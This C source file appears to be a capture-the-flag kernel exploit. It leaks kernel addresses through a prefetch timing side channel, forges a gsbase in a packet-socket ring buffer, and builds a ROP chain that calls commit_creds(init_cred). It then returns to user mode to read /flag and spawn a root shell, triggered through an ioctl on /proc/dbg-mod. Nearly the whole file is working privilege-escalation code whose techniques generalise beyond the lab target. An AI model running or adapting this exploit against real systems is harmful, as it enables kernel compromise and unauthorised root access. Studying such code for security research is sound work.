#define _GNU_SOURCE
#include <sys/resource.h>
#include <sys/sendfile.h>
#include <sys/ioctl.h>
#include <x86intrin.h>
#include <inttypes.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>
#include <sched.h>
#include <math.h>

#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <poll.h>

#include <arpa/inet.h>
#include <netinet/if_ether.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>

#include <linux/if_packet.h>

// Offset subtracted from a page-frame number before it is scaled into a
// physmap address (see virt_to_physmap).
#define PFN_MIN 0
// log2 of the page size; PAGE_SIZE is therefore 4096 bytes.
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT)

// Short aliases for the fixed-width unsigned integer types.
typedef uint64_t u64;
typedef uint32_t u32;
typedef uint16_t u16;
typedef uint8_t u8;

// Short aliases for the fixed-width signed integer types.
typedef int64_t i64;
typedef int32_t i32;
typedef int16_t i16;
typedef int8_t i8;

// Offset added to every hard-coded kernel text address used in this file.
u64 kaslr_slide = 0;
// NOTE(review): only read (printed) in the visible code, never assigned —
// confirm whether anything else is expected to set it.
u64 physmap_base = 0;

// mmap on a packet socket's RX ring allows us to get a massive amount of
// consecutive physical memory that we can point our forged gsbase at.
//
// Creates a PF_PACKET socket, configures a single-block RX ring of 128 frames
// of 0x1000 bytes each (0x80000 bytes total), maps it read/write and fills it
// with 'A'.
//
// Returns the user-space address of the mapping. Any failure is fatal: the
// error is reported with perror() and the process exits with -1.
// The socket descriptor is deliberately left open (as in the original code);
// the mapping is never unmapped by this function.
char *map_pg_vec() {
    struct tpacket_req tp = {
        .tp_block_size = 128 * 0x1000,
        .tp_block_nr = 1,
        .tp_frame_size = 0x1000,
        .tp_frame_nr = 128,
    };
    size_t ring_len = (size_t)tp.tp_block_size * tp.tp_block_nr;

    int fd = socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_IP));
    if (fd < 0) {
        perror("[map_pg_vec] socket");
        exit(-1);
    }

    if (setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &tp, sizeof(tp)) < 0) {
        perror("[map_pg_vec] setsockopt(PACKET_RX_RING)");
        exit(-1);
    }

    // MAP_POPULATE pre-faults the pages so they are resident before the
    // caller looks them up in /proc/self/pagemap.
    char *ring = mmap(NULL, ring_len, PROT_READ | PROT_WRITE,
                      MAP_SHARED | MAP_POPULATE, fd, 0);
    if (ring == MAP_FAILED) {
        // Without this check the memset below would write through (void *)-1.
        perror("[map_pg_vec] mmap");
        exit(-1);
    }

    memset(ring, 'A', ring_len);
    return ring;
}


/*
 * Translate a user virtual address of this process into the address of the
 * same page inside a linear mapping that starts at page_offset_base.
 *
 * virt_addr:        user-space virtual address to look up.
 * page_offset_base: base address of the linear mapping.
 *
 * Reads the 64-bit /proc/self/pagemap entry for the page containing virt_addr.
 * Bits 0-54 of the entry are taken as the page-frame number and bit 63 as the
 * "present" flag.
 *
 * Returns page_offset_base + PAGE_SIZE * (pfn - PFN_MIN) (page-aligned; the
 * offset within the page is NOT added), or 0 when the entry cannot be read,
 * the page is not present, or the reported PFN is 0.
 * Exits with -1 if /proc/self/pagemap cannot be opened.
 */
u64 virt_to_physmap(u64 virt_addr, u64 page_offset_base)
{
    u64 entry = 0;
    u64 kaddr = 0;

    int fd = open("/proc/self/pagemap", O_RDONLY);
    if (fd < 0) {
        puts("[virt_to_physmap] fail to open /proc/self/pagemap");
        exit(-1);
    }

    // One u64 entry per virtual page, indexed by virtual page number.
    off_t entry_off = (off_t)((virt_addr >> PAGE_SHIFT) * sizeof(u64));
    if (lseek(fd, entry_off, SEEK_SET) == (off_t)-1 ||
        read(fd, &entry, sizeof(entry)) != (ssize_t)sizeof(entry)) {
        // A failed or short read must not be parsed as a pagemap entry.
        close(fd);
        return 0;
    }
    close(fd);

    u64 pfn = entry & ((1ULL << 55) - 1);
    u64 present = entry & (1ULL << 63);
    if (present && pfn) { // page is resident and a frame number was reported
        kaddr = page_offset_base + PAGE_SIZE * (pfn - PFN_MIN);
    }

    return kaddr;
}

/*
 * Restrict the calling thread to a single CPU.
 *
 * cpu: index of the CPU to run on.
 *
 * Pinning is best-effort: if sched_setaffinity() fails (for example because
 * the requested CPU does not exist) a warning is printed and execution
 * continues with the previous affinity.
 */
void pin_cpu(int cpu)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) != 0) {
        perror("[pin_cpu] sched_setaffinity");
    }
}

// Control flow returns here.
//
// Prints the current uid, prints up to 0x20 bytes of /flag, spawns /bin/sh,
// and then spins forever. main() stores this function's address as the
// user-mode RIP in the frame it builds, so it is entered by a jump rather than
// a call and must never return.
void from_kernel() {
    int uid = getuid();
    printf("[from_kernel]: current uid = %d\n", uid);

    // One extra byte so the buffer stays NUL-terminated even when read()
    // returns the full 0x20 bytes.
    char flag[0x20 + 1] = {0};
    int flag_fd = open("/flag", O_RDONLY);
    if (flag_fd < 0) {
        perror("[from_kernel]: open /flag");
    } else {
        if (read(flag_fd, flag, sizeof(flag) - 1) < 0) {
            perror("[from_kernel]: read /flag");
        }
        close(flag_fd);
    }
    printf("[from_kernel]: got flag = %s\n", flag);
    system("/bin/sh");

    while (1) {}
}

/*
 * Time a prefetch of addr, in TSC ticks.
 *
 * addr: address to prefetch; it is only passed to prefetcht0, never
 *       dereferenced by a load or store.
 *
 * Sequence: cpuid, three `syscall` instructions with rax = 104, rdtscp
 * (start), three prefetcht0 on addr followed by mfence, rdtscp (end).
 *
 * Returns end - start, each assembled from the edx:eax halves returned by
 * rdtscp.
 *
 * Clobbers: cpuid writes rax/rbx/rcx/rdx; `syscall` overwrites rcx and r11;
 * rdtscp writes rax/rcx/rdx; r12/r13 are used as scratch. r11 must be listed,
 * otherwise the compiler may keep addr or an output in it across the syscalls.
 * "memory" keeps surrounding memory accesses from being moved across the
 * timed region.
 */
u64 probe_entry(u64 addr)
{
    uint64_t start_lo, start_hi, end_lo, end_hi;

    asm volatile (".intel_syntax noprefix;"
        "cpuid;"    // serialization
                    //
        "mov rax, 104;"
        "syscall;"  // invoke a system call to load entry_SYSCALL_64 into the cache
        "mov rax, 104;"
        "syscall;"  // invoke a system call to load entry_SYSCALL_64 into the cache
        "mov rax, 104;"
        "syscall;"  // invoke a system call to load entry_SYSCALL_64 into the cache

        "rdtscp;"
        "mov r12, rax;"
        "mov r13, rdx;" // record the start timestamp into temporary registers to avoid cache miss

        "prefetcht0 qword ptr [%4];"
        "prefetcht0 qword ptr [%4];"
        "prefetcht0 qword ptr [%4];"
        "mfence;"   // do the prefetch

        "rdtscp;"
        "mov %2, rax;"
        "mov %3, rdx;" // save the end timestamp

        "mov %0, r12;"
        "mov %1, r13;" // save the start timestamp

        "mfence;" // make sure everything is saved correctly
        ".att_syntax;"
        : "=r" (start_lo), "=r" (start_hi), "=r" (end_lo), "=r" (end_hi)
        : "r" (addr)
        : "rax", "rbx", "rcx", "rdx", "r11", "r12", "r13", "cc", "memory");

    u64 start = (start_hi << 32) | start_lo;
    u64 end = (end_hi << 32) | end_lo;
    return end - start;
}

#define MIN_KERNEL_BASE 0xffffffff80000000ULL
#define MAX_KERNEL_BASE 0xffffffffc0000000ULL
#define KERNEL_ALIGN 0x200000ULL
char a[0x1000000];
u64 entrybleed_get_kaslr_slide_nopti()
{
    int len = (MAX_KERNEL_BASE-MIN_KERNEL_BASE-0x1000000)/KERNEL_ALIGN;
    u64 *times = malloc(sizeof(u64)*len);
    for(int i=0; i<len; i++) {
        u64 probe_addr = MIN_KERNEL_BASE + i*KERNEL_ALIGN + 0x1000000;
        u64 elapsed, sum=0;
        memset(a, 'A', sizeof(a)); // flush cache
        for(int j=0; j<1000; j++) {
            sum += probe_entry(probe_addr);
        }
        elapsed = sum;
        //printf("addr: %#llx, probe: %#llx, elapsed: %#llx\n", 0, probe_addr, elapsed);
        times[i] = elapsed;
    }

    // calculate the mean
    u64 total = 0;
    for(int i=0; i<len; i++) {
        total += times[i];
    }
    double mean = total/len;

    // calculate the std
    double tmp = 0;
    for(int i=0; i<len; i++) {
        tmp += ((double)times[i]-mean)*((double)times[i]-mean);
    }
    tmp /= len;
    double std = sqrt(tmp);

    u64 bar = (u64)(mean-std);
    //printf("bar: %#llx\n", bar);
    for(int i=0; i<len; i++) {
        if(times[i] < bar) {
            free(times);
            return i*KERNEL_ALIGN;
        }
    }
    puts("fail to leak kaslr_slide");
	exit(-1);
}

#define MIN_PHYSMAP_BASE 0xffff888000000000ULL
#define MAX_PHYSMAP_BASE 0xffffc88000000000ULL
#define PHYSMAP_ALIGN 0x40000000ULL // 1G
/*
 * Locate the base of the linear mapping by timing prefetches (see
 * probe_entry) at every PHYSMAP_ALIGN-aligned candidate in
 * [MIN_PHYSMAP_BASE, MAX_PHYSMAP_BASE).
 *
 * gsbase_offset: offset added to each candidate base to form the probed
 *                address.
 *
 * Each candidate is probed 10 times and the timings are summed. Returns the
 * candidate base with the smallest sum; on ties the lowest address wins.
 *
 * The minimum is tracked while scanning, so no buffer is allocated and there
 * is no allocation-failure path.
 */
u64 entrybleed_get_physmap_base(u64 gsbase_offset)
{
    int len = (MAX_PHYSMAP_BASE-MIN_PHYSMAP_BASE)/PHYSMAP_ALIGN;
    u64 best_time = ~0ULL;
    u64 best_base = MIN_PHYSMAP_BASE;

    for (int i = 0; i < len; i++) {
        u64 base = MIN_PHYSMAP_BASE + i*PHYSMAP_ALIGN;
        u64 probe_addr = base + gsbase_offset;
        u64 sum = 0;

        for (int j = 0; j < 10; j++) {
            sum += probe_entry(probe_addr);
        }

        // Strict '<' keeps the first (lowest) candidate on equal timings.
        if (sum < best_time) {
            best_time = sum;
            best_base = base;
        }
    }

    return best_base;
}

/*
 * Fork a child process that pins itself to `cpu` and then loops forever,
 * rewriting two consecutive u64 slots at pg_vec + 0x1dd8:
 *   [0] = address of the "pop rsp; ret" gadget (kaslr_slide + fixed address)
 *   [1] = physmap_pg_vec + 0x30100 (where main() places its chain)
 *
 * cpu:            CPU the child pins itself to.
 * pg_vec:         user-space mapping the child writes into.
 * physmap_pg_vec: address of the same memory as seen through the physmap;
 *                 used only as a number, never dereferenced here.
 * kaslr_base:     unused; the gadget address is derived from the global
 *                 kaslr_slide instead.
 *
 * The parent returns immediately. Despite the name this creates a process,
 * not a thread; the child never exits on its own and is not reaped here.
 * If fork() fails a warning is printed and no writer is started.
 */
void orw_thread(int cpu, void *pg_vec, void *physmap_pg_vec, u64 kaslr_base) {
    (void)kaslr_base;

    u64 pop_rsp_ret = kaslr_slide + 0xffffffff81e2455d;

    pid_t child = fork();
    if (child < 0) {
        perror("[orw_thread] fork");
        return;
    }
    if (child != 0) {
        return; // parent
    }

    pin_cpu(cpu);

    // volatile so every iteration really performs both stores.
    volatile u64 *stack_orw_target = (volatile u64 *)((char *)pg_vec + 0x1dd8);

    // Integer arithmetic: physmap_pg_vec is not a pointer into any object of
    // this process.
    u64 full_chain_phys = (u64)(uintptr_t)physmap_pg_vec + 0x30100;

    while (1) {
        stack_orw_target[0] = pop_rsp_ret;
        stack_orw_target[1] = full_chain_phys;
    }
}

/*
 * Drop root privileges and verify that they are really gone.
 *
 * If the real uid or gid is 0, switches the gid and then the uid to 1000.
 * Afterwards two checks must FAIL for the function to return normally:
 *   - setuid(0) must not succeed, and
 *   - chmod("/flag", 0666) must not succeed.
 * Any unexpected outcome terminates the process with exit status 1.
 *
 * NOTE(review): supplementary groups are not cleared (there is no setgroups()
 * call) — confirm this is acceptable for the intended environment.
 */
void drop_priv()
{
    if (getuid() == 0 || getgid() == 0) {
        /* process is running as root, drop privileges */
        /* gid first: once the uid is dropped, setgid() would no longer be permitted */
        if (setgid(1000) != 0) {
            perror("setgid: Unable to drop group privileges:");
            exit(1);
        }
        if (setuid(1000) != 0) {
            perror("setuid: Unable to drop user privileges:");
            exit(1);
        }
    }

    if (setuid(0) != -1) {
        printf("ERROR: Managed to regain root privileges?\n");
        exit(1);
    }

    printf("Dropped privileges!\n");
    /* uid_t is unsigned; print it as such */
    printf("Current privileges: %u\n", (unsigned)getuid());

    if (chmod("/flag", 00666) == -1) {
        printf("DEBUG: could not chmod /flag!\n");
    } else {
        printf("ERROR: was able to chmod /flag!\n");
        exit(1);
    }
}

/*
 * Signal handler (installed for SIGSEGV by main): prints a marker and the
 * current uid, runs /bin/sh, then terminates the process.
 *
 * sig: signal number (unused).
 *
 * The handler must not return: returning from a handler for a genuine
 * SIGSEGV re-executes the faulting instruction, which would fault again and
 * spawn shell after shell. stdout is flushed explicitly because _exit() does
 * not flush stdio buffers.
 *
 * NOTE(review): puts/printf/system are not async-signal-safe; kept as in the
 * original since this is a last-resort debugging aid.
 */
void handler(int sig)
{
    (void)sig;

    puts("handler");
    printf("uid: %d\n", getuid());
    fflush(stdout);
    system("/bin/sh");
    _exit(1);
}


int main(int argc, char **argv) {
    struct arb_read_req {
        u64 *src;
        u64 *dst;
    } req;
    void *physbase = 0;
    void *gsbase = 0;

	signal(SIGSEGV, handler);

    pin_cpu(15);

    //kaslr_slide = entrybleed_get_kaslr_slide_nopti();
    kaslr_slide = 0;
    u64 kaslr_base = 0xffffffff81000000 + kaslr_slide;
	printf("kaslr_base: %#llx\n", kaslr_base);
    //physmap_base = entrybleed_get_physmap_base(0x17f80000);
	physbase = (void *)0xffff888000000000;
	printf("physmap_base: %#llx\n", physmap_base);

    u32 dbg = open("/proc/dbg-mod", 2);

    // Allocate memory aread for forged gsbase
    void *pg_vec = map_pg_vec();

    // Need to find our pg_vec in physmap
    //void *physmap_pg_vec = physbase + virt2phys(pg_vec) + 0x10000000;
    void *physmap_pg_vec = virt_to_physmap(pg_vec, physbase);
    printf("phys pg_vec: %p\n", physmap_pg_vec);

	drop_priv();

	for(int i=0; i<15; i++) {
		orw_thread(i, pg_vec, physmap_pg_vec, kaslr_base);
	}

    // target code:
    /*
    0xffffffff82200040 <entry_SYSCALL_64>:	    swapgs
    0xffffffff82200043 <entry_SYSCALL_64+3>:	mov    QWORD PTR gs:0x6014,rsp
    0xffffffff8220004c <entry_SYSCALL_64+12>:	jmp    0xffffffff82200060 <entry_SYSCALL_64+32>
    0xffffffff8220004e <entry_SYSCALL_64+14>:	mov    rsp,cr3
    0xffffffff82200051 <entry_SYSCALL_64+17>:	nop    DWORD PTR [rax+rax*1+0x0]
    0xffffffff82200056 <entry_SYSCALL_64+22>:	and    rsp,0xffffffffffffe7ff
    0xffffffff8220005d <entry_SYSCALL_64+29>:	mov    cr3,rsp
    0xffffffff82200060 <entry_SYSCALL_64+32>:	mov    rsp,QWORD PTR gs:0x32898
    */

    // Our new rsp will come from this offset of our swapped in gsbase
    u64 gs_pivot_offset = 0x33958;
    u64 gs_stack_addr = (u64)(physmap_pg_vec + 0x2000);

    *(u64 *)(pg_vec + gs_pivot_offset) = gs_stack_addr;

    // without creating a forged task struct we would page fault here in do_SYSCALL_64
    /*
    0xffffffff83ec25c7 <+87>:	mov    rax,QWORD PTR gs:0x30000
    0xffffffff83ec25d0 <+96>:	mov    rax,QWORD PTR [rax+0x20]
    */
    u64 kstack_offset = 0x1a000; // kstack_offset
    void *kstack = pg_vec + 0x8000;

    u64 task_offset = 0x33940; // pcpu_hot
    void *usr_task_addr = pg_vec + 0x4000;
    u64 forged_task_addr = (u64)(physmap_pg_vec + 0x4000);
    *(u64 *)(pg_vec+task_offset) = forged_task_addr;

    // forge syscall_work
    void *task_stack_addr = (pg_vec + 0x4000) + 0x8;
    *(u64 *)task_stack_addr = 0;




    // We need to mimic the preempt_count of a normal syscall: 0x80000000
    /*
    0xffffffff83ec8202 <lockdep_hardirqs_off+18> mov    eax, DWORD PTR gs:[rip+0x7c167dff]        # 0x30008 <pcpu_hot+8>
    0xffffffff83ec8209 <lockdep_hardirqs_off+25> test   eax, 0xf00000
    */
    void *percpu_preempt_count = pg_vec + 0x30008;
    *(u64 *)percpu_preempt_count = 0x80000000;

    // might need to mimic normal hardirqs_enabled value: 0x1
    /*
    0xffffffff83ec821f <lockdep_hardirqs_off+47> mov    eax, DWORD PTR gs:[rip+0x7c154676]        # 0x1c89c <hardirqs_enabled>
    0xffffffff83ec8226 <lockdep_hardirqs_off+54> test   eax, eax
    */
    //*(u8 *)(pg_vec + 0x1c89c) = 1;

    // thought this neeed to be 0x4 but I guess not
    /*
    0xffffffff83ec9a15 <check_preemption_disabled+53> mov    rax, QWORD PTR gs:0x30000
    0xffffffff83ec9a1e <check_preemption_disabled+62> test   BYTE PTR [rax+0x2f], 0x4
    */
    *(u8 *)(usr_task_addr + 0x2f) = 0x0;

    /* make migration_disabled true
    0xffffffff83ec9a2b <+75>:	mov    rbx,QWORD PTR gs:0x30000
    0xffffffff83ec9a34 <+84>:	cmp    WORD PTR [rbx+0x438],0x0
    0xffffffff83ec9a3c <+92>:	jne    0xffffffff83ec99fe <check_preemption_disabled+30>
    */
    *(u64 *)(usr_task_addr + 0x830) = 1;

    // Store our malicious gsbase address in userspace's gsbase
	asm volatile("wrgsbase %0" :: "r" (physmap_pg_vec) : "memory");

    // we want this for later
    u64 saved_rsp;
    asm(".intel_syntax noprefix;"
        "mov %0, rsp;"
        ".att_syntax prefix;"
        : "=r"(saved_rsp)
    );
    // ensure rsp is aligned for later
    saved_rsp |= 0x8;

    u64 cli_ret =      kaslr_slide + 0xffffffff821651b5;
    u64 sti_ret =      kaslr_slide + 0xffffffff820b70e1; // : sti; ret;
    u64 swapgs_ret =   kaslr_slide + 0xffffffff8216308d; //: swapgs; pop rbp; jmp 0xffffffff821834e0 <__x86_return_thunk>;
    u64 pop_rdi_ret =  kaslr_slide + 0xffffffff81fd524d; //: pop rdi; ret;
    u64 init_cred =    kaslr_slide + 0xffffffff8327c098;
    u64 commit_creds = kaslr_slide + 0xffffffff8113d240;
    u64 pop_rcx_ret =  kaslr_slide + 0xffffffff8165016d; // : pop rcx; ret;
    u64 iretq =        kaslr_slide + 0xffffffff822022c0; //: iretq;
    u64 user_rip_target = (u64)from_kernel;

    u64 *full_chain_usr = pg_vec + 0x30100;
    full_chain_usr[0] = cli_ret; // once swapgs executes we don't care anyways
    full_chain_usr[1] = swapgs_ret;
    full_chain_usr[2] = 0;
    full_chain_usr[3] = pop_rdi_ret;
    full_chain_usr[4] = init_cred;
    full_chain_usr[5] = commit_creds;
    full_chain_usr[6] = swapgs_ret;
    full_chain_usr[7] = saved_rsp; // rbp
    full_chain_usr[8] = iretq;
    full_chain_usr[9] = user_rip_target;
    full_chain_usr[10] = 0x33;  // cs
    full_chain_usr[11] = 0x246; // eflags
    full_chain_usr[12] = saved_rsp;
    full_chain_usr[13] = 0x2b;  // ss

    printf("Triggering gadget...\n");

    sleep(1);

    // Trigger a hijacked call with the entry_SYSCALL_64 gadget
    u64 entry_SYSCALL_64 = kaslr_slide + 0xffffffff82200080 + 0x10;
    ioctl(dbg, 1339, entry_SYSCALL_64);

    // Control flow continues in from_kernel()

    return 0;
}

